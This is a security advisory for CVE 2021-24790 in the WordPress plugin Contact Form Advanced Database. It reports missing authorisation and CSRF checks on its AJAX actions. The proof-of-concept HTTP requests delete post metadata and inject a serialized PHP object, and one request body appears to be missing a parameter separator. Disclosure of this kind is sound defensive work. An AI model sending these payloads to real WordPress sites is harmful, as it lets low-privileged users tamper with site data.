Contact Form Advanced Database <= 1.0.8 – Unauthorised AJAX Calls | CVE 2021-24790

Description

The plugin does not have any authorisation as well as CSRF checks in its delete_cf7_data and export_cf7_data AJAX actions, available to any authenticated users, which could allow users with a role as low as subscriber to call them. The delete_cf7_data would lead to arbitrary metadata deletion, as well as PHP Object Injection if a suitable gadget chain is present in another plugin, as user data is passed to the maybe_unserialize() function without being first validated.

Proof of Concept

To delete the _edit_lock metadata of the post ID 18:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock


To prove the object injection, we inserted a new class in the plugin file:

# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=